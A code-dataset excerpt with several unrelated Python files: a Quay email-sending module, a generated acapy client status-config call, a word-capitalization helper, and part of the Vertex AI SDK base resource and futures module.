from _init import ROOT_DIR
from singletons.config import app_config, get_app_url
from singletons.mail import mail
from util.jinjautil import get_template_env
from util.html import html2text
from util.fips import login_fips_safe
logger = logging.getLogger(__name__)
template_env = get_template_env(os.path.join(ROOT_DIR, "emails"))
class CannotSendEmailException(Exception):
pass
class GmailAction(object):
"""
Represents an action that can be taken in Gmail in response to the email.
"""
def __init__(self, metadata):
self.metadata = metadata
@staticmethod
def confirm(name, url, description):
return GmailAction(
{
"@context": "http://schema.org",
"@type": "EmailMessage",
"action": {
"@type": "ConfirmAction",
"name": name,
"handler": {"@type": "HttpActionHandler", "url": get_app_url() + "/" + url},
},
"description": description,
}
)
@staticmethod
def view(name, url, description):
return GmailAction(
{
"@context": "http://schema.org",
"@type": "EmailMessage",
"action": {"@type": "ViewAction", "name": name, "url": get_app_url() + "/" + url},
"description": description,
}
)
def send_email(recipient, subject, template_file, parameters, action=None):
app_title = app_config["REGISTRY_TITLE_SHORT"]
app_url = get_app_url()
html, plain = render_email(
app_title, app_url, recipient, subject, template_file, parameters, action=None
)
msg = Message("[%s] %s" % (app_title, subject), recipients=[recipient])
msg.html = html
msg.body = plain
try:
if features.FIPS:
assert app_config[
"MAIL_USE_TLS"
], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
with mock.patch("smtplib.SMTP.login", login_fips_safe):
mail.send(msg)
else:
mail.send(msg)
if app_config["TESTING"]:
logger.debug("Quay is configured for testing. Email not sent: '%s'", msg.subject)
else:
logger.debug("Sent email: '%s'", msg.subject)
except Exception as ex:
logger.exception("Error while trying to send email to %s", recipient)
raise CannotSendEmailException(str(ex))
def render_email(app_title, app_url, recipient, subject, template_file, parameters, action=None):
def app_link_handler(url=None):
return app_url + "/" + url if url else app_url
app_logo = app_config.get("ENTERPRISE_LOGO_URL", "https://quay.io/static/img/quay-logo.png")
parameters.update(
{
"subject": subject,
"app_logo": app_logo,
"app_url": app_url,
"app_title": app_title,
"hosted": features.BILLING,
"app_link": app_link_handler,
"action_metadata": json.dumps(action.metadata) if action else None,
"with_base_template": True,
}
)
rendered_html = template_env.get_template(template_file + ".html").render(parameters)
parameters.update(
{
"with_base_template": False,
}
)
rendered_for_plain = template_env.get_template(template_file + ".html").render(parameters)
return rendered_html, html2text(rendered_for_plain)
def send_password_changed(username, email):
send_email(email, "Account password changed", "passwordchanged", {"username": username})
def send_email_changed(username, old_email, new_email):
send_email(
old_email,
"Account e-mail address changed",
"emailchanged",
{"username": username, "new_email": new_email},
)
def send_change_email(username, email, token):
send_email(
email,
"E-mail address change requested",
"changeemail",
{"username": username, "token": token},
)
def send_confirmation_email(username, email, token):
action = GmailAction.confirm(
"Confirm E-mail", "confirm?code=" + token, "Verification of e-mail address"
)
send_email(
email,
"Please confirm your e-mail address",
"confirmemail",
{"username": username, "token": token},
action=action,
)
def send_repo_authorization_email(namespace, repository, email, token):
action = GmailAction.confirm(
"Verify E-mail", "authrepoemail?code=" + token, "Verification of e-mail address"
)
subject = "Please verify your e-mail address for repository %s/%s" % (namespace, repository)
send_email(
email,
subject,
"repoauthorizeemail",
{"namespace": namespace, "repository": repository, "token": token},
action=action,
)
def send_org_recovery_email(org, admin_users):
subject = "Organization %s recovery" % (org.username)
send_email(
org.email,
subject,
"orgrecovery",
{
"organization": org.username,
"admin_usernames": [user.username for user in admin_users],
},
)
def send_recovery_email(email, token):
action = GmailAction.view("Recover Account", "recovery?code=" + token, "Recovery of an account")
subject = "Account recovery"
send_email(email, subject, "recovery", {"email": email, "token": token}, action=action)
def send_payment_failed(email, username):
send_email(email, "Subscription Payment Failure", "paymentfailure", {"username": username})
def send_org_invite_email(member_name, member_email, orgname, team, adder, code):
action = GmailAction.view(
"Join %s" % team, "confirminvite?code=" + code, "Invitation to join a team"
)
send_email(
member_email,
"Invitation to join team",
"teaminvite",
{"inviter": adder, "token": code, "organization": orgname, "teamname": team},
action=action,
)
def send_invoice_email(email, contents):
# Note: This completely generates the contents of the email, so we don't use the
# normal template here.
msg = Message("Quay payment received - Thank you!", recipients=[email])
msg.html = contents
if features.FIPS:
assert app_config["MAIL_USE_TLS"], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
with mock.patch("smtplib.SMTP.login", login_fips_safe):
mail.send(msg)
else:
mail.send(msg)
def send_logs_exported_email(
email, export_id, status, exported_data_url=None, exported_data_expiration=None
):
send_email(
email,
"Export Action Logs Complete",
"logsexported",
{
"status": status,
"export_id": export_id,
"exported_data_url": exported_data_url,
"exported_data_expiration": exported_data_expiration,
},
)
# INTERNAL EMAILS BELOW
def send_subscription_change(change_description, customer_id, customer_email, quay_username):
SUBSCRIPTION_CHANGE_TITLE = "Subscription Change - {0} {1}"
SUBSCRIPTION_CHANGE = """
Change: {0}<br>
Customer id: <a href="https://manage.stripe.com/customers/{1}">{1}</a><br>
Customer email: <a href="mailto:{2}">{2}</a><br>
Quay user or org name: {3}<br>
"""
title = SUBSCRIPTION_CHANGE_TITLE.format(quay_username, change_description)
msg = Message(title, recipients=["stripe@quay.io"])
msg.html = SUBSCRIPTION_CHANGE.format(
change_description, customer_id, customer_email, quay_username
)
if features.FIPS:
assert app_config["MAIL_USE_TLS"], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
with mock.patch("smtplib.SMTP.login", login_fips_safe):
mail.send(msg)
else:
mail.send(msg)
| 30.582375 | 100 | 0.62879 |
ace8e76de88d5fdf1746e11c5e1ef93407d64fd2 | 1,900 | py | Python | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | 4 | 2021-08-05T09:20:34.000Z | 2021-08-08T19:37:29.000Z | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | null | null | null | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | 2 | 2021-08-12T18:18:45.000Z | 2021-08-14T13:22:28.000Z | from typing import Any, Dict, Optional
import httpx
from ...client import Client
from ...models.admin_config import AdminConfig
from ...types import Response
def _get_kwargs(
*,
client: Client,
) -> Dict[str, Any]:
url = "{}/status/config".format(client.base_url)
headers: Dict[str, Any] = client.get_headers()
cookies: Dict[str, Any] = client.get_cookies()
return {
"url": url,
"headers": headers,
"cookies": cookies,
"timeout": client.get_timeout(),
}
def _parse_response(*, response: httpx.Response) -> Optional[AdminConfig]:
if response.status_code == 200:
response_200 = AdminConfig.from_dict(response.json())
return response_200
return None
def _build_response(*, response: httpx.Response) -> Response[AdminConfig]:
return Response(
status_code=response.status_code,
content=response.content,
headers=response.headers,
parsed=_parse_response(response=response),
)
def sync_detailed(
*,
client: Client,
) -> Response[AdminConfig]:
kwargs = _get_kwargs(
client=client,
)
response = httpx.get(
verify=client.verify_ssl,
**kwargs,
)
return _build_response(response=response)
def sync(
*,
client: Client,
) -> Optional[AdminConfig]:
""" """
return sync_detailed(
client=client,
).parsed
async def asyncio_detailed(
*,
client: Client,
) -> Response[AdminConfig]:
kwargs = _get_kwargs(
client=client,
)
async with httpx.AsyncClient(verify=client.verify_ssl) as _client:
response = await _client.get(**kwargs)
return _build_response(response=response)
async def asyncio(
*,
client: Client,
) -> Optional[AdminConfig]:
""" """
return (
await asyncio_detailed(
client=client,
)
).parsed
| 19.791667 | 74 | 0.628947 |
ace8e7af5f48232cc5b1fd05a750d5571e7efeaa | 512 | py | Python | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
] | 1 | 2021-09-06T04:46:08.000Z | 2021-09-06T04:46:08.000Z | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
] | null | null | null | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
] | null | null | null | def capitalize_words(string):
n = len(string)
i = 0
while i < n:
if not string[i].isalpha():
pass
elif i == 0:
# first char char is alphabetical
string = string[:i] + string[i:].capitalize()
elif not string[i - 1].isalpha():
# this char is alphabetical and last char is not
# start of new word
string = string[:i] + string[i:].capitalize()
else:
pass
i += 1
return string
| 28.444444 | 60 | 0.5 |
ace8e84b36197bd07990c135d0932b19932dcd3c | 46,893 | py | Python | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | 1 | 2022-03-30T05:23:29.000Z | 2022-03-30T05:23:29.000Z | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from concurrent import futures
import datetime
import functools
import inspect
import logging
import sys
import threading
import time
from typing import (
Any,
Callable,
Dict,
List,
Iterable,
Optional,
Sequence,
Tuple,
Type,
Union,
)
import proto
from google.api_core import retry
from google.api_core import operation
from google.auth import credentials as auth_credentials
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import utils
from google.cloud.aiplatform.compat.types import encryption_spec as gca_encryption_spec
from google.protobuf import json_format
logging.basicConfig(level=logging.INFO, stream=sys.stdout)
# This is the default retry callback to be used with get methods.
_DEFAULT_RETRY = retry.Retry()
class Logger:
"""Logging wrapper class with high level helper methods."""
def __init__(self, name: str = ""):
"""Initializes logger with name.
Args:
name (str): Name to associate with logger.
"""
self._logger = logging.getLogger(name)
def log_create_with_lro(
self,
cls: Type["VertexAiResourceNoun"],
lro: Optional[operation.Operation] = None,
):
"""Logs create event with LRO.
Args:
cls (VertexAiResourceNoun):
Vertex AI Resource Noun class that is being created.
lro (operation.Operation):
Optional. Backing LRO for creation.
"""
self._logger.info(f"Creating {cls.__name__}")
if lro:
self._logger.info(
f"Create {cls.__name__} backing LRO: {lro.operation.name}"
)
def log_create_complete(
self,
cls: Type["VertexAiResourceNoun"],
resource: proto.Message,
variable_name: str,
):
"""Logs create event is complete.
Will also include code snippet to instantiate resource in SDK.
Args:
cls (VertexAiResourceNoun):
Vertex AI Resource Noun class that is being created.
resource (proto.Message):
Vertex AI Resource proto.Message
variable_name (str): Name of variable to use for code snippet
"""
self._logger.info(f"{cls.__name__} created. Resource name: {resource.name}")
self._logger.info(f"To use this {cls.__name__} in another session:")
self._logger.info(
f"{variable_name} = aiplatform.{cls.__name__}('{resource.name}')"
)
def log_create_complete_with_getter(
self,
cls: Type["VertexAiResourceNoun"],
resource: proto.Message,
variable_name: str,
):
"""Logs create event is complete.
Will also include code snippet to instantiate resource in SDK.
Args:
cls (VertexAiResourceNoun):
Vertex AI Resource Noun class that is being created.
resource (proto.Message):
Vertex AI Resource proto.Message
variable_name (str): Name of variable to use for code snippet
"""
self._logger.info(f"{cls.__name__} created. Resource name: {resource.name}")
self._logger.info(f"To use this {cls.__name__} in another session:")
self._logger.info(
f"{variable_name} = aiplatform.{cls.__name__}.get('{resource.name}')"
)
def log_action_start_against_resource(
self, action: str, noun: str, resource_noun_obj: "VertexAiResourceNoun"
):
"""Logs intention to start an action against a resource.
Args:
action (str): Action to complete against the resource ie: "Deploying". Can be empty string.
noun (str): Noun the action acts on against the resource. Can be empty string.
resource_noun_obj (VertexAiResourceNoun):
Resource noun object the action is acting against.
"""
self._logger.info(
f"{action} {resource_noun_obj.__class__.__name__} {noun}: {resource_noun_obj.resource_name}"
)
def log_action_started_against_resource_with_lro(
self,
action: str,
noun: str,
cls: Type["VertexAiResourceNoun"],
lro: operation.Operation,
):
"""Logs an action started against a resource with lro.
Args:
action (str): Action started against resource. ie: "Deploy". Can be empty string.
noun (str): Noun the action acts on against the resource. Can be empty string.
cls (VertexAiResourceNoun):
Resource noun object the action is acting against.
lro (operation.Operation): Backing LRO for action.
"""
self._logger.info(
f"{action} {cls.__name__} {noun} backing LRO: {lro.operation.name}"
)
def log_action_completed_against_resource(
self, noun: str, action: str, resource_noun_obj: "VertexAiResourceNoun"
):
"""Logs action completed against resource.
Args:
noun (str): Noun the action acts on against the resource. Can be empty string.
action (str): Action started against resource. ie: "Deployed". Can be empty string.
resource_noun_obj (VertexAiResourceNoun):
Resource noun object the action is acting against
"""
self._logger.info(
f"{resource_noun_obj.__class__.__name__} {noun} {action}. Resource name: {resource_noun_obj.resource_name}"
)
def __getattr__(self, attr: str):
"""Forward remainder of logging to underlying logger."""
return getattr(self._logger, attr)
_LOGGER = Logger(__name__)
class FutureManager(metaclass=abc.ABCMeta):
"""Tracks concurrent futures against this object."""
def __init__(self):
self.__latest_future_lock = threading.Lock()
# Always points to the latest future. All submitted futures will always
# form a dependency on the latest future.
self.__latest_future = None
# Caches Exception of any executed future. Once one exception occurs
# all additional futures should fail and any additional invocations will block.
self._exception = None
def _raise_future_exception(self):
"""Raises exception if one of the object's futures has raised."""
with self.__latest_future_lock:
if self._exception:
raise self._exception
def _complete_future(self, future: futures.Future):
"""Checks for exception of future and removes the pointer if it's still
latest.
Args:
future (futures.Future): Required. A future to complete.
"""
with self.__latest_future_lock:
try:
future.result() # raises
except Exception as e:
self._exception = e
if self.__latest_future is future:
self.__latest_future = None
def _are_futures_done(self) -> bool:
"""Helper method to check to all futures are complete.
Returns:
True if no latest future.
"""
with self.__latest_future_lock:
return self.__latest_future is None
def wait(self):
"""Helper method to that blocks until all futures are complete."""
future = self.__latest_future
if future:
futures.wait([future], return_when=futures.FIRST_EXCEPTION)
self._raise_future_exception()
@property
def _latest_future(self) -> Optional[futures.Future]:
"""Get the latest future if it exists."""
with self.__latest_future_lock:
return self.__latest_future
@_latest_future.setter
def _latest_future(self, future: Optional[futures.Future]):
"""Optionally set the latest future and add a complete_future
callback."""
with self.__latest_future_lock:
self.__latest_future = future
if future:
future.add_done_callback(self._complete_future)
def _submit(
self,
method: Callable[..., Any],
args: Sequence[Any],
kwargs: Dict[str, Any],
additional_dependencies: Optional[Sequence[futures.Future]] = None,
callbacks: Optional[Sequence[Callable[[futures.Future], Any]]] = None,
internal_callbacks: Iterable[Callable[[Any], Any]] = None,
) -> futures.Future:
"""Submit a method as a future against this object.
Args:
method (Callable): Required. The method to submit.
args (Sequence): Required. The arguments to call the method with.
kwargs (dict): Required. The keyword arguments to call the method with.
additional_dependencies (Optional[Sequence[futures.Future]]):
Optional. Additional dependent futures to wait on before executing
method. Note: No validation is done on the dependencies.
callbacks (Optional[Sequence[Callable[[futures.Future], Any]]]):
Optional. Additional Future callbacks to execute once this created
Future is complete.
Returns:
future (Future): Future of the submitted method call.
"""
def wait_for_dependencies_and_invoke(
deps: Sequence[futures.Future],
method: Callable[..., Any],
args: Sequence[Any],
kwargs: Dict[str, Any],
internal_callbacks: Iterable[Callable[[Any], Any]],
) -> Any:
"""Wrapper method to wait on any dependencies before submitting
method.
Args:
deps (Sequence[futures.Future]):
Required. Dependent futures to wait on before executing method.
Note: No validation is done on the dependencies.
method (Callable): Required. The method to submit.
args (Sequence[Any]): Required. The arguments to call the method with.
kwargs (Dict[str, Any]):
Required. The keyword arguments to call the method with.
internal_callbacks: (Callable[[Any], Any]):
Callbacks that take the result of method.
"""
for future in set(deps):
future.result()
result = method(*args, **kwargs)
# call callbacks from within future
if internal_callbacks:
for callback in internal_callbacks:
callback(result)
return result
# Retrieves any dependencies from arguments.
deps = [
arg._latest_future
for arg in list(args) + list(kwargs.values())
if isinstance(arg, FutureManager)
]
# Retrieves exceptions and raises
# if any upstream dependency has an exception
exceptions = [
arg._exception
for arg in list(args) + list(kwargs.values())
if isinstance(arg, FutureManager) and arg._exception
]
if exceptions:
raise exceptions[0]
# filter out objects that do not have pending tasks
deps = [dep for dep in deps if dep]
if additional_dependencies:
deps.extend(additional_dependencies)
with self.__latest_future_lock:
# form a dependency on the latest future of this object
if self.__latest_future:
deps.append(self.__latest_future)
self.__latest_future = initializer.global_pool.submit(
wait_for_dependencies_and_invoke,
deps=deps,
method=method,
args=args,
kwargs=kwargs,
internal_callbacks=internal_callbacks,
)
future = self.__latest_future
# Clean up callback captures exception as well as removes future.
# May execute immediately and take lock.
future.add_done_callback(self._complete_future)
if callbacks:
for c in callbacks:
future.add_done_callback(c)
return future
@classmethod
@abc.abstractmethod
def _empty_constructor(cls) -> "FutureManager":
"""Should construct object with all non FutureManager attributes as
None."""
pass
@abc.abstractmethod
def _sync_object_with_future_result(self, result: "FutureManager"):
"""Should sync the object from _empty_constructor with result of
future."""
def __repr__(self) -> str:
if self._exception:
return f"{object.__repr__(self)} failed with {str(self._exception)}"
if self.__latest_future:
return f"{object.__repr__(self)} is waiting for upstream dependencies to complete."
return object.__repr__(self)
class VertexAiResourceNoun(metaclass=abc.ABCMeta):
"""Base class the Vertex AI resource nouns.
Subclasses require two class attributes:
client_class: The client to instantiate to interact with this resource noun.
Subclass is required to populate private attribute _gca_resource which is the
service representation of the resource noun.
"""
@property
@classmethod
@abc.abstractmethod
def client_class(cls) -> Type[utils.VertexAiServiceClientWithOverride]:
"""Client class required to interact with resource with optional
overrides."""
pass
@property
@classmethod
@abc.abstractmethod
def _getter_method(cls) -> str:
"""Name of getter method of client class for retrieving the
resource."""
pass
@property
@classmethod
@abc.abstractmethod
def _delete_method(cls) -> str:
"""Name of delete method of client class for deleting the resource."""
pass
@property
@classmethod
@abc.abstractmethod
def _resource_noun(cls) -> str:
"""Resource noun."""
pass
@property
@classmethod
@abc.abstractmethod
def _parse_resource_name_method(cls) -> str:
"""Method name on GAPIC client to parse a resource name."""
pass
@property
@classmethod
@abc.abstractmethod
def _format_resource_name_method(self) -> str:
"""Method name on GAPIC client to format a resource name."""
pass
# Override this value with staticmethod
# to use custom resource id validators per resource
_resource_id_validator: Optional[Callable[[str], None]] = None
def __init__(
self,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
resource_name: Optional[str] = None,
):
"""Initializes class with project, location, and api_client.
Args:
project(str): Project of the resource noun.
location(str): The location of the resource noun.
credentials(google.auth.credentials.Credentials): Optional custom
credentials to use when accessing interacting with resource noun.
resource_name(str): A fully-qualified resource name or ID.
"""
if resource_name:
project, location = self._get_and_validate_project_location(
resource_name=resource_name, project=project, location=location
)
self.project = project or initializer.global_config.project
self.location = location or initializer.global_config.location
self.credentials = credentials or initializer.global_config.credentials
self.api_client = self._instantiate_client(self.location, self.credentials)
@classmethod
def _instantiate_client(
cls,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> utils.VertexAiServiceClientWithOverride:
"""Helper method to instantiate service client for resource noun.
Args:
location (str): The location of the resource noun.
credentials (google.auth.credentials.Credentials):
Optional custom credentials to use when accessing interacting with
resource noun.
Returns:
client (utils.VertexAiServiceClientWithOverride):
Initialized service client for this service noun with optional overrides.
"""
return initializer.global_config.create_client(
client_class=cls.client_class,
credentials=credentials,
location_override=location,
)
@classmethod
def _parse_resource_name(cls, resource_name: str) -> Dict[str, str]:
"""
Parses resource name into its component segments.
Args:
resource_name: Resource name of this resource.
Returns:
Dictionary of component segments.
"""
# gets the underlying wrapped gapic client class
return getattr(
cls.client_class.get_gapic_client_class(), cls._parse_resource_name_method
)(resource_name)
@classmethod
def _format_resource_name(cls, **kwargs: str) -> str:
"""
Formats a resource name using its component segments.
Args:
**kwargs: Resource name parts. Singular and snake case. ie:
format_resource_name(
project='my-project',
location='us-central1'
)
Returns:
Resource name.
"""
# gets the underlying wrapped gapic client class
return getattr(
cls.client_class.get_gapic_client_class(), cls._format_resource_name_method
)(**kwargs)
def _get_and_validate_project_location(
self,
resource_name: str,
project: Optional[str] = None,
location: Optional[str] = None,
) -> Tuple[str, str]:
"""Validate the project and location for the resource.
Args:
resource_name(str): Required. A fully-qualified resource name or ID.
project(str): Project of the resource noun.
location(str): The location of the resource noun.
Raises:
RuntimeError: If location is different from resource location
"""
fields = self._parse_resource_name(resource_name)
if not fields:
return project, location
if location and fields["location"] != location:
raise RuntimeError(
f"location {location} is provided, but different from "
f"the resource location {fields['location']}"
)
return fields["project"], fields["location"]
def _get_gca_resource(
self,
resource_name: str,
parent_resource_name_fields: Optional[Dict[str, str]] = None,
) -> proto.Message:
"""Returns GAPIC service representation of client class resource.
Args:
resource_name (str): Required. A fully-qualified resource name or ID.
parent_resource_name_fields (Dict[str,str]):
Optional. Mapping of parent resource name key to values. These
will be used to compose the resource name if only resource ID is given.
Should not include project and location.
"""
resource_name = utils.full_resource_name(
resource_name=resource_name,
resource_noun=self._resource_noun,
parse_resource_name_method=self._parse_resource_name,
format_resource_name_method=self._format_resource_name,
project=self.project,
location=self.location,
parent_resource_name_fields=parent_resource_name_fields,
resource_id_validator=self._resource_id_validator,
)
return getattr(self.api_client, self._getter_method)(
name=resource_name, retry=_DEFAULT_RETRY
)
def _sync_gca_resource(self):
"""Sync GAPIC service representation of client class resource."""
self._gca_resource = self._get_gca_resource(resource_name=self.resource_name)
@property
def name(self) -> str:
"""Name of this resource."""
self._assert_gca_resource_is_available()
return self._gca_resource.name.split("/")[-1]
@property
def resource_name(self) -> str:
"""Full qualified resource name."""
self._assert_gca_resource_is_available()
return self._gca_resource.name
@property
def display_name(self) -> str:
"""Display name of this resource."""
self._assert_gca_resource_is_available()
return self._gca_resource.display_name
@property
def create_time(self) -> datetime.datetime:
"""Time this resource was created."""
self._assert_gca_resource_is_available()
return self._gca_resource.create_time
@property
def update_time(self) -> datetime.datetime:
"""Time this resource was last updated."""
self._sync_gca_resource()
return self._gca_resource.update_time
@property
def encryption_spec(self) -> Optional[gca_encryption_spec.EncryptionSpec]:
"""Customer-managed encryption key options for this Vertex AI resource.
If this is set, then all resources created by this Vertex AI resource will
be encrypted with the provided encryption key.
"""
self._assert_gca_resource_is_available()
return getattr(self._gca_resource, "encryption_spec")
@property
def labels(self) -> Dict[str, str]:
"""User-defined labels containing metadata about this resource.
Read more about labels at https://goo.gl/xmQnxf
"""
self._assert_gca_resource_is_available()
return dict(self._gca_resource.labels)
@property
def gca_resource(self) -> proto.Message:
"""The underlying resource proto representation."""
self._assert_gca_resource_is_available()
return self._gca_resource
@property
def _resource_is_available(self) -> bool:
"""Returns True if GCA resource has been created and is available, otherwise False"""
try:
self._assert_gca_resource_is_available()
return True
except RuntimeError:
return False
def _assert_gca_resource_is_available(self) -> None:
"""Helper method to raise when property is not accessible.
Raises:
RuntimeError: If _gca_resource is has not been created.
"""
if self._gca_resource is None:
raise RuntimeError(
f"{self.__class__.__name__} resource has not been created"
)
def __repr__(self) -> str:
return f"{object.__repr__(self)} \nresource name: {self.resource_name}"
def to_dict(self) -> Dict[str, Any]:
"""Returns the resource proto as a dictionary."""
return json_format.MessageToDict(self.gca_resource._pb)
def optional_sync(
construct_object_on_arg: Optional[str] = None,
return_input_arg: Optional[str] = None,
bind_future_to_self: bool = True,
):
"""Decorator for VertexAiResourceNounWithFutureManager with optional sync
support.
Methods with this decorator should include a "sync" argument that defaults to
True. If called with sync=False this decorator will launch the method as a
concurrent Future in a separate Thread.
Note that this is only robust enough to support our current end to end patterns
and may not be suitable for new patterns.
Args:
construct_object_on_arg (str):
Optional. If provided, will only construct output object if arg is present.
Example: If custom training does not produce a model.
return_input_arg (str):
Optional. If provided will return passed in argument instead of
constructing.
Example: Model.deploy(Endpoint) returns the passed in Endpoint
bind_future_to_self (bool):
Whether to add this future to the calling object.
Example: Model.deploy(Endpoint) would be set to False because we only
want the deployment Future to be associated with Endpoint.
"""
def optional_run_in_thread(method: Callable[..., Any]):
"""Optionally run this method concurrently in separate Thread.
Args:
method (Callable[..., Any]): Method to optionally run in separate Thread.
"""
@functools.wraps(method)
def wrapper(*args, **kwargs):
"""Wraps method."""
sync = kwargs.pop("sync", True)
bound_args = inspect.signature(method).bind(*args, **kwargs)
self = bound_args.arguments.get("self")
calling_object_latest_future = None
# check to see if this object has any exceptions
if self:
calling_object_latest_future = self._latest_future
self._raise_future_exception()
# if sync then wait for any Futures to complete and execute
if sync:
if self:
VertexAiResourceNounWithFutureManager.wait(self)
return method(*args, **kwargs)
# callbacks to call within the Future (in same Thread)
internal_callbacks = []
# callbacks to add to the Future (may or may not be in same Thread)
callbacks = []
# additional Future dependencies to capture
dependencies = []
# all methods should have type signatures
return_type = get_annotation_class(
inspect.getfullargspec(method).annotations["return"]
)
# object produced by the method
returned_object = bound_args.arguments.get(return_input_arg)
# is a classmethod that creates the object and returns it
if args and inspect.isclass(args[0]):
# assumes class in classmethod is the resource noun
returned_object = (
args[0]._empty_constructor()
if not returned_object
else returned_object
)
self = returned_object
else: # instance method
# if we're returning an input object
if returned_object and returned_object is not self:
# make sure the input object doesn't have any exceptions
# from previous futures
returned_object._raise_future_exception()
# if the future will be associated with both the returned object
# and calling object then we need to add additional callback
# to remove the future from the returned object
# if we need to construct a new empty returned object
should_construct = not returned_object and bound_args.arguments.get(
construct_object_on_arg, not construct_object_on_arg
)
if should_construct:
if return_type is not None:
returned_object = return_type._empty_constructor()
# if the future will be associated with both the returned object
# and calling object then we need to add additional callback
# to remove the future from the returned object
if returned_object and bind_future_to_self:
callbacks.append(returned_object._complete_future)
if returned_object:
# sync objects after future completes
internal_callbacks.append(
returned_object._sync_object_with_future_result
)
# If the future is not associated with the calling object
# then the return object future needs to form a dependency on the
# the latest future in the calling object.
if not bind_future_to_self:
if calling_object_latest_future:
dependencies.append(calling_object_latest_future)
self = returned_object
future = self._submit(
method=method,
callbacks=callbacks,
internal_callbacks=internal_callbacks,
additional_dependencies=dependencies,
args=[],
kwargs=bound_args.arguments,
)
# if the calling object is the one that submitted then add it's future
# to the returned object
if returned_object and returned_object is not self:
returned_object._latest_future = future
return returned_object
return wrapper
return optional_run_in_thread
class VertexAiResourceNounWithFutureManager(VertexAiResourceNoun, FutureManager):
"""Allows optional asynchronous calls to this Vertex AI Resource
Nouns."""
def __init__(
self,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
resource_name: Optional[str] = None,
):
"""Initializes class with project, location, and api_client.
Args:
project (str): Optional. Project of the resource noun.
location (str): Optional. The location of the resource noun.
credentials(google.auth.credentials.Credentials):
Optional. custom credentials to use when accessing interacting with
resource noun.
resource_name(str): A fully-qualified resource name or ID.
"""
VertexAiResourceNoun.__init__(
self,
project=project,
location=location,
credentials=credentials,
resource_name=resource_name,
)
FutureManager.__init__(self)
@classmethod
def _empty_constructor(
cls,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
resource_name: Optional[str] = None,
) -> "VertexAiResourceNounWithFutureManager":
"""Initializes with all attributes set to None.
The attributes should be populated after a future is complete. This allows
scheduling of additional API calls before the resource is created.
Args:
project (str): Optional. Project of the resource noun.
location (str): Optional. The location of the resource noun.
credentials(google.auth.credentials.Credentials):
Optional. custom credentials to use when accessing interacting with
resource noun.
resource_name(str): A fully-qualified resource name or ID.
Returns:
An instance of this class with attributes set to None.
"""
self = cls.__new__(cls)
VertexAiResourceNoun.__init__(
self,
project=project,
location=location,
credentials=credentials,
resource_name=resource_name,
)
FutureManager.__init__(self)
self._gca_resource = None
return self
def _sync_object_with_future_result(
self, result: "VertexAiResourceNounWithFutureManager"
):
"""Populates attributes from a Future result to this object.
Args:
result: VertexAiResourceNounWithFutureManager
Required. Result of future with same type as this object.
"""
sync_attributes = [
"project",
"location",
"api_client",
"_gca_resource",
"credentials",
]
optional_sync_attributes = ["_prediction_client"]
for attribute in sync_attributes:
setattr(self, attribute, getattr(result, attribute))
for attribute in optional_sync_attributes:
value = getattr(result, attribute, None)
if value:
setattr(self, attribute, value)
@classmethod
def _construct_sdk_resource_from_gapic(
cls,
gapic_resource: proto.Message,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> VertexAiResourceNoun:
"""Given a GAPIC resource object, return the SDK representation.
Args:
gapic_resource (proto.Message):
A GAPIC representation of a Vertex AI resource, usually
retrieved by a get_* or in a list_* API call.
project (str):
Optional. Project to construct SDK object from. If not set,
project set in aiplatform.init will be used.
location (str):
Optional. Location to construct SDK object from. If not set,
location set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to construct SDK object.
Overrides credentials set in aiplatform.init.
Returns:
VertexAiResourceNoun:
An initialized SDK object that represents GAPIC type.
"""
sdk_resource = cls._empty_constructor(
project=project, location=location, credentials=credentials
)
sdk_resource._gca_resource = gapic_resource
return sdk_resource
# TODO(b/144545165): Improve documentation for list filtering once available
# TODO(b/184910159): Expose `page_size` field in list method
@classmethod
def _list(
cls,
cls_filter: Callable[[proto.Message], bool] = lambda _: True,
filter: Optional[str] = None,
order_by: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
parent: Optional[str] = None,
) -> List[VertexAiResourceNoun]:
"""Private method to list all instances of this Vertex AI Resource,
takes a `cls_filter` arg to filter to a particular SDK resource
subclass.
Args:
cls_filter (Callable[[proto.Message], bool]):
A function that takes one argument, a GAPIC resource, and returns
